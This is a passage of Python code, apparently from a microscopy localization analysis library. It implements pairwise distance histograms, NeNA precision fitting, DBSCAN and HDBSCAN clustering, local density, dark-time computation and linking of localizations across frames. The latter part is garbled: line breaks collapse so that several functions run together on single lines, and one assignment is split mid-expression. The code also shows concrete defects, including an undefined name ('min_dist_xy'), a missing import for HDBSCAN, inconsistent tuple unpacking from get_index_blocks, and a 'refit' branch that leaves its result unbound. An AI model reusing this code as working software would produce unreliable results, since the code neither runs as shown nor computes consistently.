    locs, size, x_index, y_index, block_starts, block_ends, K, L = index_blocks
    # Re-derive the block coordinates of the query point (shadows the unpacked index arrays)
    x_index = _np.uint32(x / size)  # is this really necessary?
    y_index = _np.uint32(y / size)  # is this really necessary?
    indices = []
    for k in range(y_index - 1, y_index + 2):
        # NOTE(review): `0 < k < K` excludes row/column 0, same as n_block_locs_at — TODO confirm
        if 0 < k < K:
            for l in range(x_index - 1, x_index + 2):
                if 0 < l < L:
                    indices.append(list(range(block_starts[k, l], block_ends[k, l])))
    indices = list(_itertools.chain(*indices))
    return locs[indices]


def _fill_index_blocks(block_starts, block_ends, x_index, y_index, counter=None):
    """Populate block start/end index ranges for the sorted (y_index, x_index) arrays.

    Runs in a worker thread; `counter[0]` is updated with the number of finished rows
    so the GUI thread can poll progress.
    """
    Y, X = block_starts.shape
    N = len(x_index)
    k = 0
    if counter is not None:
        counter[0] = 0
    for i in range(Y):
        for j in range(X):
            k = _fill_index_block(block_starts, block_ends, N, x_index, y_index, i, j, k)
        if counter is not None:
            counter[0] = i+1


@_numba.jit(nopython=True, nogil=True)
def _fill_index_block(block_starts, block_ends, N, x_index, y_index, i, j, k):
    """Advance cursor k through the sorted arrays to delimit block (i, j)."""
    block_starts[i, j] = k
    while k < N and y_index[k] == i and x_index[k] == j:
        k += 1
    block_ends[i, j] = k
    return k


@_numba.jit(nopython=True, nogil=True)
def _distance_histogram(locs, bin_size, r_max, x_index, y_index, block_starts, block_ends, start, chunk):
    """Histogram of pairwise distances below r_max for locs[start:start+chunk] (one thread's share).

    Only pairs with j > i are counted, so summing the per-thread histograms counts
    each pair exactly once.
    """
    x = locs.x
    y = locs.y
    dh_len = _np.uint32(r_max / bin_size)
    dh = _np.zeros(dh_len, dtype=_np.uint32)
    r_max_2 = r_max**2
    K, L = block_starts.shape
    end = min(start+chunk, len(locs))
    for i in range(start, end):
        xi = x[i]
        yi = y[i]
        ki = y_index[i]
        li = x_index[i]
        # NOTE(review): only blocks (ki..ki+1, li..li+2-1) are scanned; the down-left diagonal
        # neighbor (ki+1, li-1) is never visited from either side — TODO confirm this is intended.
        for k in range(ki, ki+2):
            if k < K:
                for l in range(li, li+2):
                    if l < L:
                        for j in range(block_starts[k, l], block_ends[k, l]):
                            if j > i:
                                # Cheap per-axis rejection before the sqrt
                                dx2 = (xi - x[j])**2
                                if dx2 < r_max_2:
                                    dy2 = (yi - y[j])**2
                                    if dy2 < r_max_2:
                                        d = _np.sqrt(dx2 + dy2)
                                        if d < r_max:
                                            bin = _np.uint32(d / bin_size)
                                            if bin < dh_len:
                                                dh[bin] += 1
    return dh


def distance_histogram(locs, info, bin_size, r_max):
    """Pairwise distance histogram (bin width `bin_size`, up to `r_max`), parallelized over threads."""
    locs, size, x_index, y_index, block_starts, block_ends, K, L = get_index_blocks(locs, info, r_max)
    N = len(locs)
    n_threads = _multiprocessing.cpu_count()
    chunk = int(N / n_threads)  # NOTE(review): chunk can be 0 when N < n_threads → range() raises
    starts = range(0, N, chunk)
    args = [(locs, bin_size, r_max, x_index, y_index, block_starts, block_ends, start, chunk) for start in starts]
    with _ThreadPoolExecutor() as executor:
        futures = [executor.submit(_distance_histogram,
                                   *_) for _ in args]
        results = [future.result() for future in futures]
    # Per-thread histograms cover disjoint i-ranges; summing merges them
    return _np.sum(results, axis=0)


def nena(locs, info, callback=None):
    """
    NeNA (next-frame neighbor analysis) localization precision estimate.

    Fits the next-frame neighbor distance histogram with a two-component model
    (same-molecule term + displaced term using a modified Bessel function) and
    returns the lmfit result and the fitted precision `s`.
    """
    bin_centers, dnfl_ = next_frame_neighbor_distance_histogram(locs, callback)

    def func(d, a, s, ac, dc, sc):
        f = a * (d / s**2) * _np.exp(-0.5 * d**2 / s**2)
        fc = ac * (d / sc**2) * _np.exp(-0.5 * (d**2 + dc**2) / sc**2) * _iv(0, d * dc / sc)
        return f + fc

    pdf_model = _lmfit.Model(func)
    params = _lmfit.Parameters()
    area = _np.trapz(dnfl_, bin_centers)
    median_lp = _np.mean([_np.median(locs.lpx), _np.median(locs.lpy)])
    # Initial guesses: split the histogram area evenly between the two components
    params.add('a', value=area/2, min=0)
    params.add('s', value=median_lp, min=0)
    params.add('ac', value=area/2, min=0)
    params.add('dc', value=2*median_lp, min=0)
    params.add('sc', value=median_lp, min=0)
    result = pdf_model.fit(dnfl_, params, d=bin_centers)
    return result, result.best_values['s']


def next_frame_neighbor_distance_histogram(locs, callback=None):
    """Histogram of distances to same-group neighbors in the immediately following frame.

    NOTE: sorts `locs` by frame in place.
    """
    locs.sort(kind='mergesort', order='frame')
    frame = locs.frame
    x = locs.x
    y = locs.y
    if hasattr(locs, 'group'):
        group = locs.group
    else:
        group = _np.zeros(len(locs), dtype=_np.int32)
    bin_size = 0.001
    d_max = 1.0
    return _nfndh(frame, x, y, group, d_max, bin_size, callback)


def _nfndh(frame, x, y, group, d_max, bin_size, callback=None):
    """Accumulate the next-frame neighbor histogram, reporting progress in 1% steps."""
    N = len(frame)
    bins = _np.arange(0, d_max, bin_size)
    dnfl = _np.zeros(len(bins))
    # NOTE(review): percent-based chunking skips the last N % 100 localizations — TODO confirm acceptable
    one_percent = int(N / 100)
    starts = one_percent * _np.arange(100)
    for k, start in enumerate(starts):
        for i in range(start, start + one_percent):
            _fill_dnfl(N, frame, x, y, group, i, d_max, dnfl, bin_size)
        if callback is not None:
            callback(k+1)
    bin_centers = bins + bin_size / 2
    return bin_centers, dnfl


@_numba.jit(nopython=True)
def _fill_dnfl(N, frame, x, y, group, i, d_max, dnfl, bin_size):
    """Add localization i's next-frame, same-group neighbor distances into dnfl."""
    frame_i = frame[i]
    x_i = x[i]
    y_i = y[i]
    group_i = group[i]
    # Locate the index range of the next frame (the frame array is sorted)
    min_frame = frame_i + 1
    for min_index in range(i + 1, N):
        if frame[min_index] >= min_frame:
            break
    max_frame = frame_i + 1
    for max_index in range(min_index, N):
        if frame[max_index] > max_frame:
            break
    d_max_2 =
d_max**2
    for j in range(min_index, max_index):
        if group[j] == group_i:
            dx2 = (x_i - x[j])**2
            if dx2 <= d_max_2:
                dy2 = (y_i - y[j])**2
                if dy2 <= d_max_2:
                    d = _np.sqrt(dx2 + dy2)
                    if d <= d_max:
                        bin = int(d / bin_size)
                        dnfl[bin] += 1


def pair_correlation(locs, info, bin_size, r_max):
    """Radial pair correlation: distance histogram normalized by each annulus' area."""
    dh = distance_histogram(locs, info, bin_size, r_max)
    # Start at r = bin_size -> otherwise the first annulus area would be 0
    bins_lower = _np.arange(bin_size, r_max+bin_size, bin_size)
    if bins_lower.shape[0] > dh.shape[0]:
        bins_lower = bins_lower[:-1]
    area = _np.pi * bin_size * (2 * bins_lower + bin_size)
    return bins_lower, dh / area


def dbscan(locs, radius, min_density):
    """
    DBSCAN clustering of localizations (2D, or 3D if a z column is present).

    Noise points (label -1) are dropped. Returns (clusters, locs): per-cluster
    statistics as a record array, and the localizations with a 'group' column appended.

    NOTE: prompts on stdin for the pixel size in the 3D case.
    """
    print('Identifying clusters...')
    if hasattr(locs, 'z'):
        print('z-coordinates detected')
        pixelsize = int(input("Enter the pixelsize in nm/px:"))
        locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y) & _np.isfinite(locs.z)]
        # z is stored in nm; convert to pixels so all three axes share units
        X = _np.vstack((locs.x, locs.y, locs.z/pixelsize)).T
        db = _DBSCAN(eps=radius, min_samples=min_density).fit(X)
        group = _np.int32(db.labels_)  # int32 for Origin compatibility
        locs = _lib.append_to_rec(locs, group, 'group')
        locs = locs[locs.group != -1]
        print('Generating cluster information...')
        groups = _np.unique(locs.group)
        n_groups = len(groups)
        mean_frame = _np.zeros(n_groups)
        std_frame = _np.zeros(n_groups)
        com_x = _np.zeros(n_groups)
        com_y = _np.zeros(n_groups)
        com_z = _np.zeros(n_groups)
        std_x = _np.zeros(n_groups)
        std_y = _np.zeros(n_groups)
        std_z = _np.zeros(n_groups)
        convex_hull = _np.zeros(n_groups)
        volume = _np.zeros(n_groups)
        n = _np.zeros(n_groups, dtype=_np.int32)
        for i, group in enumerate(groups):
            # NOTE(review): selects by position `i`, not label `group` — works because DBSCAN
            # labels are consecutive 0..n-1 after dropping -1, but `== group` would be safer.
            group_locs = locs[locs.group == i]
            mean_frame[i] = _np.mean(group_locs.frame)
            com_x[i] = _np.mean(group_locs.x)
            com_y[i] = _np.mean(group_locs.y)
            com_z[i] = _np.mean(group_locs.z)
            std_frame[i] = _np.std(group_locs.frame)
            std_x[i] = _np.std(group_locs.x)
            std_y[i] = _np.std(group_locs.y)
            std_z[i] = _np.std(group_locs.z)
            n[i] = len(group_locs)
            X_group = _np.stack([group_locs.x,group_locs.y,group_locs.z/pixelsize], axis=0).T
            # Sphere volume from the mean per-axis std (2*std as an effective radius)
            volume[i] = _np.power((std_x[i]+std_y[i]+(std_z[i]/pixelsize))/3*2,3)*_np.pi*4/3
            try:
                hull = ConvexHull(X_group)
                convex_hull[i] = hull.volume
            except:  # NOTE(review): bare except hides real errors; qhull raises QhullError for degenerate input
                convex_hull[i] = 0
        clusters = _np.rec.array(
            (groups, convex_hull, volume, mean_frame, com_x, com_y, com_z,
             std_frame, std_x, std_y, std_z, n),
            dtype=[('groups', groups.dtype), ('convex_hull', 'f4'), ('volume', 'f4'),
                   ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'), ('com_z', 'f4'),
                   ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('std_z', 'f4'),
                   ('n', 'i4')])
    else:
        # 2D case: same pipeline without z; reports area instead of volume
        locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y)]
        X = _np.vstack((locs.x, locs.y)).T
        db = _DBSCAN(eps=radius, min_samples=min_density).fit(X)
        group = _np.int32(db.labels_)  # int32 for Origin compatibility
        locs = _lib.append_to_rec(locs, group, 'group')
        locs = locs[locs.group != -1]
        print('Generating cluster information...')
        groups = _np.unique(locs.group)
        n_groups = len(groups)
        mean_frame = _np.zeros(n_groups)
        std_frame = _np.zeros(n_groups)
        com_x = _np.zeros(n_groups)
        com_y = _np.zeros(n_groups)
        std_x = _np.zeros(n_groups)
        std_y = _np.zeros(n_groups)
        convex_hull = _np.zeros(n_groups)
        area = _np.zeros(n_groups)
        n = _np.zeros(n_groups, dtype=_np.int32)
        for i, group in enumerate(groups):
            # NOTE(review): positional selection, see z-branch note
            group_locs = locs[locs.group == i]
            mean_frame[i] = _np.mean(group_locs.frame)
            com_x[i] = _np.mean(group_locs.x)
            com_y[i] = _np.mean(group_locs.y)
            std_frame[i] = _np.std(group_locs.frame)
            std_x[i] = _np.std(group_locs.x)
            std_y[i] = _np.std(group_locs.y)
            n[i] = len(group_locs)
            X_group = _np.stack([group_locs.x,group_locs.y], axis=0).T
            area[i] = _np.power((std_x[i]+std_y[i]),2)*_np.pi
            try:
                hull = ConvexHull(X_group)
                convex_hull[i] = hull.volume
            except:  # NOTE(review): bare except, see z-branch note
                convex_hull[i] = 0
        clusters = _np.rec.array(
            (groups, convex_hull, area, mean_frame, com_x, com_y,
             std_frame, std_x, std_y, n),
            dtype=[('groups', groups.dtype), ('convex_hull', 'f4'), ('area', 'f4'),
                   ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'),
                   ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('n',
'i4')])
    return clusters, locs


def hdbscan(locs, min_samples, min_cluster_size):
    """
    HDBSCAN clustering of localizations; mirrors dbscan() but with HDBSCAN parameters.

    NOTE(review): `_HDBSCAN` is never imported in this module — calling this raises
    NameError until an `from hdbscan import HDBSCAN as _HDBSCAN` (or similar) is added.
    """
    print('Identifying clusters...')
    if hasattr(locs, 'z'):
        print('z-coordinates detected')
        pixelsize = int(input("Enter the pixelsize in nm/px:"))
        locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y) & _np.isfinite(locs.z)]
        # z is stored in nm; convert to pixels so all three axes share units
        X = _np.vstack((locs.x, locs.y, locs.z/pixelsize)).T
        db = _HDBSCAN(min_samples=min_samples, min_cluster_size=min_cluster_size).fit(X)
        group = _np.int32(db.labels_)  # int32 for Origin compatibility
        locs = _lib.append_to_rec(locs, group, 'group')
        locs = locs[locs.group != -1]
        print('Generating cluster information...')
        groups = _np.unique(locs.group)
        n_groups = len(groups)
        mean_frame = _np.zeros(n_groups)
        std_frame = _np.zeros(n_groups)
        com_x = _np.zeros(n_groups)
        com_y = _np.zeros(n_groups)
        com_z = _np.zeros(n_groups)
        std_x = _np.zeros(n_groups)
        std_y = _np.zeros(n_groups)
        std_z = _np.zeros(n_groups)
        convex_hull = _np.zeros(n_groups)
        volume = _np.zeros(n_groups)
        n = _np.zeros(n_groups, dtype=_np.int32)
        for i, group in enumerate(groups):
            # NOTE(review): positional selection by `i`; relies on consecutive labels
            group_locs = locs[locs.group == i]
            mean_frame[i] = _np.mean(group_locs.frame)
            com_x[i] = _np.mean(group_locs.x)
            com_y[i] = _np.mean(group_locs.y)
            com_z[i] = _np.mean(group_locs.z)
            std_frame[i] = _np.std(group_locs.frame)
            std_x[i] = _np.std(group_locs.x)
            std_y[i] = _np.std(group_locs.y)
            std_z[i] = _np.std(group_locs.z)
            n[i] = len(group_locs)
            X_group = _np.stack([group_locs.x,group_locs.y,group_locs.z/pixelsize], axis=0).T
            volume[i] = _np.power((std_x[i]+std_y[i]+(std_z[i]/pixelsize))/3*2,3)*_np.pi*4/3
            try:
                hull = ConvexHull(X_group)
                convex_hull[i] = hull.volume
            except:  # NOTE(review): bare except, consistent with dbscan()
                convex_hull[i] = 0
        clusters = _np.rec.array(
            (groups, convex_hull, volume, mean_frame, com_x, com_y, com_z,
             std_frame, std_x, std_y, std_z, n),
            dtype=[('groups', groups.dtype), ('convex_hull', 'f4'), ('volume', 'f4'),
                   ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'), ('com_z', 'f4'),
                   ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('std_z', 'f4'),
                   ('n', 'i4')])
    else:
        # 2D case: same pipeline without z; reports area instead of volume
        locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y)]
        X = _np.vstack((locs.x, locs.y)).T
        db = _HDBSCAN(min_samples=min_samples, min_cluster_size=min_cluster_size).fit(X)
        group = _np.int32(db.labels_)  # int32 for Origin compatibility
        locs = _lib.append_to_rec(locs, group, 'group')
        locs = locs[locs.group != -1]
        print('Generating cluster information...')
        groups = _np.unique(locs.group)
        n_groups = len(groups)
        mean_frame = _np.zeros(n_groups)
        std_frame = _np.zeros(n_groups)
        com_x = _np.zeros(n_groups)
        com_y = _np.zeros(n_groups)
        std_x = _np.zeros(n_groups)
        std_y = _np.zeros(n_groups)
        convex_hull = _np.zeros(n_groups)
        area = _np.zeros(n_groups)
        n = _np.zeros(n_groups, dtype=_np.int32)
        for i, group in enumerate(groups):
            # NOTE(review): positional selection by `i`; relies on consecutive labels
            group_locs = locs[locs.group == i]
            mean_frame[i] = _np.mean(group_locs.frame)
            com_x[i] = _np.mean(group_locs.x)
            com_y[i] = _np.mean(group_locs.y)
            std_frame[i] = _np.std(group_locs.frame)
            std_x[i] = _np.std(group_locs.x)
            std_y[i] = _np.std(group_locs.y)
            n[i] = len(group_locs)
            X_group = _np.stack([group_locs.x,group_locs.y], axis=0).T
            area[i] = _np.power((std_x[i]+std_y[i]),2)*_np.pi
            try:
                hull = ConvexHull(X_group)
                convex_hull[i] = hull.volume
            except:  # NOTE(review): bare except, consistent with dbscan()
                convex_hull[i] = 0
        clusters = _np.rec.array(
            (groups, convex_hull, area, mean_frame, com_x, com_y,
             std_frame, std_x, std_y, n),
            dtype=[('groups', groups.dtype), ('convex_hull', 'f4'), ('area', 'f4'),
                   ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'),
                   ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('n', 'i4')])
    return clusters, locs


@_numba.jit(nopython=True, nogil=True)
def _local_density(locs, radius, x_index, y_index, block_starts, block_ends, start, chunk):
    """Count neighbors within `radius` for locs[start:start+chunk] (one thread's share).

    Returns a full-length array that is zero outside this thread's range, so the
    per-thread results can simply be summed.
    """
    x = locs.x
    y = locs.y
    N = len(x)
    r2 = radius**2
    end = min(start+chunk, N)
    density = _np.zeros(N, dtype=_np.uint32)
    for i in range(start, end):
        yi = y[i]
        xi = x[i]
        ki = y_index[i]
        li = x_index[i]
        di = 0
        # NOTE(review): unlike the other block scans, there is no bounds check on k/l here;
        # edge blocks index out of range (or wrap for -1) — TODO confirm inputs avoid the border.
        for k in range(ki-1, ki+2):
            for l in range(li-1, li+2):
                j_min = block_starts[k, l]
                j_max = block_ends[k, l]
                for j in range(j_min, j_max):
                    dx2 =
(xi - x[j])**2 if dx2 < r2: dy2 = (yi - y[j])**2 if dy2 < r2: d2 = dx2 + dy2 if d2 < r2: di += 1 density[i] = di return density def compute_local_density(locs, info, radius): locs, x_index, y_index, block_starts, block_ends = get_index_blocks(locs, info, radius) N = len(locs) n_threads = _multiprocessing.cpu_count() chunk = int(N / n_threads) starts = range(0, N, chunk) args = [(locs, radius, x_index, y_index, block_starts, block_ends, start, chunk) for start in starts] with _ThreadPoolExecutor() as executor: futures = [executor.submit(_local_density, *_) for _ in args] density = _np.sum([future.result() for future in futures], axis=0) locs = _lib.remove_from_rec(locs, 'density') return _lib.append_to_rec(locs, density, 'density') def compute_dark_times(locs, group=None): dark = dark_times(locs, group) locs = _lib.append_to_rec(locs, _np.int32(dark), 'dark') locs = locs[locs.dark != -1] return locs def dark_times(locs, group=None): last_frame = locs.frame + locs.len - 1 if group is None: if hasattr(locs, 'group'): group = locs.group else: group = _np.zeros(len(locs)) dark = _dark_times(locs, group, last_frame) return dark @_numba.jit(nopython=True) def _dark_times(locs, group, last_frame): N = len(locs) max_frame = locs.frame.max() dark = max_frame * _np.ones(len(locs), dtype=_np.int32) for i in range(N): for j in range(N): if (group[i] == group[j]) and (i != j): dark_ij = locs.frame[i] - last_frame[j] if (dark_ij > 0) and (dark_ij < dark[i]): dark[i] = dark_ij for i in range(N): if dark[i] == max_frame: dark[i] = -1 return dark def link(locs, info, r_max=0.05, max_dark_time=1, combine_mode='average', remove_ambiguous_lengths=True): if len(locs) == 0: linked_locs = locs.copy() if hasattr(locs, 'frame'): linked_locs = _lib.append_to_rec(linked_locs, _np.array([], dtype=_np.int32), 'len') linked_locs = _lib.append_to_rec(linked_locs, _np.array([], dtype=_np.int32), 'n') if hasattr(locs, 'photons'): linked_locs = _lib.append_to_rec(linked_locs, _np.array([], 
                                            dtype=_np.float32), 'photon_rate')
    else:
        locs.sort(kind='mergesort', order='frame')
        if hasattr(locs, 'group'):
            group = locs.group
        else:
            group = _np.zeros(len(locs), dtype=_np.int32)
        link_group = get_link_groups(locs, r_max, max_dark_time, group)
        if combine_mode == 'average':
            linked_locs = link_loc_groups(locs, info, link_group, remove_ambiguous_lengths=remove_ambiguous_lengths)
        elif combine_mode == 'refit':
            # TODO
            # NOTE(review): 'refit' leaves linked_locs unbound → NameError at the return below
            pass
    return linked_locs


def weighted_variance(locs):
    """Photon-weighted variance of x and y positions (currently unused; see cluster_combine)."""
    n = len(locs)
    w = locs.photons
    x = locs.x
    y = locs.y
    xWbarx = _np.average(locs.x, weights=w)
    xWbary = _np.average(locs.y, weights=w)
    wbarx = _np.mean(locs.lpx)
    wbary = _np.mean(locs.lpy)
    variance_x = n/((n-1)*sum(w)**2)*(sum((w*x-wbarx*xWbarx)**2)-2*xWbarx*sum((w-wbarx)*(w*x-wbarx*xWbarx))+xWbarx**2*sum((w-wbarx)**2))
    variance_y = n/((n-1)*sum(w)**2)*(sum((w*y-wbary*xWbary)**2)-2*xWbary*sum((w-wbary)*(w*y-wbary*xWbary))+xWbary**2*sum((w-wbary)**2))
    return variance_x, variance_y


# Combine localizations: calculate the properties of the group
def cluster_combine(locs):
    """Collapse each (group, cluster) pair into one combined localization.

    Positions are photon-weighted means; lpx/lpy (and lpz in 3D) are standard
    errors of the mean. Requires 'group' and 'cluster' columns.
    """
    print('Combining localizations...')
    combined_locs = []
    if hasattr(locs[0], 'z'):
        print('z-mode')
        for group in _tqdm(_np.unique(locs['group'])):
            temp = locs[locs['group']==group]
            cluster = _np.unique(temp['cluster'])
            n_cluster = len(cluster)
            mean_frame = _np.zeros(n_cluster)
            std_frame = _np.zeros(n_cluster)
            com_x = _np.zeros(n_cluster)
            com_y = _np.zeros(n_cluster)
            com_z = _np.zeros(n_cluster)
            std_x = _np.zeros(n_cluster)
            std_y = _np.zeros(n_cluster)
            std_z = _np.zeros(n_cluster)
            group_id = _np.zeros(n_cluster)
            n = _np.zeros(n_cluster, dtype=_np.int32)
            for i, clusterval in enumerate(cluster):
                cluster_locs = temp[temp['cluster']== clusterval]
                mean_frame[i] = _np.mean(cluster_locs.frame)
                # Photon-weighted center of mass
                com_x[i] = _np.average(cluster_locs.x, weights=cluster_locs.photons)
                com_y[i] = _np.average(cluster_locs.y, weights=cluster_locs.photons)
                com_z[i] = _np.average(cluster_locs.z, weights=cluster_locs.photons)
                std_frame[i] = _np.std(cluster_locs.frame)
#variance_x, variance_y = weighted_variance(cluster_locs) std_x[i] = _np.std(cluster_locs.x)/_np.sqrt(len(cluster_locs)) std_y[i] = _np.std(cluster_locs.y)/_np.sqrt(len(cluster_locs)) std_z[i] = _np.std(cluster_locs.z)/_np.sqrt(len(cluster_locs)) n[i] = len(cluster_locs) group_id[i] = group clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('lpz', 'f4'), ('n', 'i4')]) combined_locs.append(clusters) else: for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = _np.zeros(n_cluster) std_frame = _np.zeros(n_cluster) com_x = _np.zeros(n_cluster) com_y = _np.zeros(n_cluster) std_x = _np.zeros(n_cluster) std_y = _np.zeros(n_cluster) group_id = _np.zeros(n_cluster) n = _np.zeros(n_cluster, dtype=_np.int32) for i, clusterval in enumerate(cluster): cluster_locs = temp[temp['cluster']== clusterval] mean_frame[i] = _np.mean(cluster_locs.frame) com_x[i] = _np.average(cluster_locs.x,weights = cluster_locs.photons) com_y[i] = _np.average(cluster_locs.y,weights = cluster_locs.photons) std_frame[i] = _np.std(cluster_locs.frame) #variance_x, variance_y = weighted_variance(cluster_locs) std_x[i] = _np.std(cluster_locs.x)/_np.sqrt(len(cluster_locs)) std_y[i] = _np.std(cluster_locs.y)/_np.sqrt(len(cluster_locs)) n[i] = len(cluster_locs) group_id[i] = group clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, std_frame, std_x, std_y, n), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('n', 'i4')]) combined_locs.append(clusters) combined_locs = stack_arrays(combined_locs, asrecarray=True, usemask=False) return combined_locs def 
cluster_combine_dist(locs): print('Calculating distances...') if hasattr(locs, 'z'): print('XYZ') pixelsize = int(input("Enter the pixelsize in nm/px:")) combined_locs = [] for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = temp['mean_frame'] std_frame = temp['std_frame'] com_x = temp['x'] com_y = temp['y'] com_z = temp['z'] std_x = temp['lpx'] std_y = temp['lpy'] std_z = temp['lpz'] group_id = temp['group'] n = temp['n'] min_dist = _np.zeros(n_cluster) min_distz = _np.zeros(n_cluster) for i, clusterval in enumerate(cluster): #find nearest neighbor in xyz group_locs = temp[temp['cluster']!= clusterval] cluster_locs = temp[temp['cluster']== clusterval] ref_point = _np.array([cluster_locs.x, cluster_locs.y, cluster_locs.z/pixelsize]) all_points = _np.array([group_locs.x, group_locs.y, group_locs.z/pixelsize]) distances = distance.cdist(ref_point.transpose(), all_points.transpose()) min_dist[i] = _np.amin(distances) #find nearest neighbor in xy ref_point_xy = _np.array([cluster_locs.x, cluster_locs.y]) all_points_xy = _np.array([group_locs.x, group_locs.y]) distances_xy = distance.cdist(ref_point_xy.transpose(), all_points_xy.transpose()) min_dist_xy[i] = _np.amin(distances_xy) clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n, min_dist, min_dist_xy), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('lpz', 'f4'), ('n', 'i4'), ('min_dist', 'f4'), ('mind_dist_xy', 'f4')]) combined_locs.append(clusters) else: #2D Case print('XY') combined_locs = [] for group in _tqdm(_np.unique(locs['group'])): temp = locs[locs['group']==group] cluster = _np.unique(temp['cluster']) n_cluster = len(cluster) mean_frame = temp['mean_frame'] std_frame = temp['std_frame'] com_x = temp['x'] com_y = temp['y'] 
std_x = temp['lpx'] std_y = temp['lpy'] group_id = temp['group'] n = temp['n'] min_dist = _np.zeros(n_cluster) for i, clusterval in enumerate(cluster): #find nearest neighbor in xyz group_locs = temp[temp['cluster']!= clusterval] cluster_locs = temp[temp['cluster']== clusterval] ref_point_xy = _np.array([cluster_locs.x, cluster_locs.y]) all_points_xy = _np.array([group_locs.x, group_locs.y]) distances_xy = distance.cdist(ref_point_xy.transpose(), all_points_xy.transpose()) min_dist[i] = _np.amin(distances_xy) clusters = _np.rec.array((group_id, cluster, mean_frame, com_x, com_y, std_frame, std_x, std_y, n, min_dist), dtype=[('group', group.dtype),('cluster', cluster.dtype), ('mean_frame', 'f4'), ('x', 'f4'), ('y', 'f4'), ('std_frame', 'f4'), ('lpx', 'f4'), ('lpy', 'f4'), ('n', 'i4'), ('min_dist', 'f4')]) combined_locs.append(clusters) combined_locs = stack_arrays(combined_locs, asrecarray=True, usemask=False) return combined_locs @_numba.jit(nopython=True) def get_link_groups(locs, d_max, max_dark_time, group): ''' Assumes that locs are sorted by frame ''' frame = locs.frame x = locs.x y = locs.y N = len(x) link_group = -_np.ones(N, dtype=_np.int32) current_link_group = -1 for i in range(N): if link_group[i] == -1: # loc has no group yet current_link_group += 1 link_group[i] = current_link_group current_index = i next_loc_index_in_group = _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group) while next_loc_index_in_group != -1: link_group[next_loc_index_in_group] = current_link_group current_index = next_loc_index_in_group next_loc_index_in_group = _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group) return link_group @_numba.jit(nopython=True) def _get_next_loc_index_in_link_group(current_index, link_group, N, frame, x, y, d_max, max_dark_time, group): current_frame = frame[current_index] current_x = x[current_index] current_y = y[current_index] current_group = 
group[current_index] min_frame = current_frame + 1 for min_index in range(current_index + 1, N): if frame[min_index] >= min_frame: break max_frame = current_frame + max_dark_time + 1 for max_index in range(min_index, N): if frame[max_index] > max_frame: break else: max_index = N d_max_2 = d_max**2 for j in range(min_index, max_index): if group[j] == current_group: if link_group[j] == -1: dx2 = (current_x - x[j])**2 if dx2 <= d_max_2: dy2 = (current_y - y[j])**2 if dy2 <= d_max_2: if _np.sqrt(dx2 + dy2) <= d_max: return j return -1 @_numba.jit(nopython=True) def _link_group_count(link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=_np.uint32) for i in range(n_locs): i_ = link_group[i] result[i_] += 1 return result @_numba.jit(nopython=True) def _link_group_sum(column, link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=column.dtype) for i in range(n_locs): i_ = link_group[i] result[i_] += column[i] return result @_numba.jit(nopython=True) def _link_group_mean(column, link_group, n_locs, n_groups, n_locs_per_group): group_sum = _link_group_sum(column, link_group, n_locs, n_groups) result = _np.empty(n_groups, dtype=_np.float32) # this ensures float32 after the division result[:] = group_sum / n_locs_per_group return result @_numba.jit(nopython=True) def _link_group_weighted_mean(column, weights, link_group, n_locs, n_groups, n_locs_per_group): sum_weights = _link_group_sum(weights, link_group, n_locs, n_groups) return _link_group_mean(column * weights, link_group, n_locs, n_groups, sum_weights), sum_weights @_numba.jit(nopython=True) def _link_group_min_max(column, link_group, n_locs, n_groups): min_ = _np.empty(n_groups, dtype=column.dtype) max_ = _np.empty(n_groups, dtype=column.dtype) min_[:] = column.max() max_[:] = column.min() for i in range(n_locs): i_ = link_group[i] value = column[i] if value < min_[i_]: min_[i_] = value if value > max_[i_]: max_[i_] = value return min_, max_ @_numba.jit(nopython=True) def _link_group_last(column, 
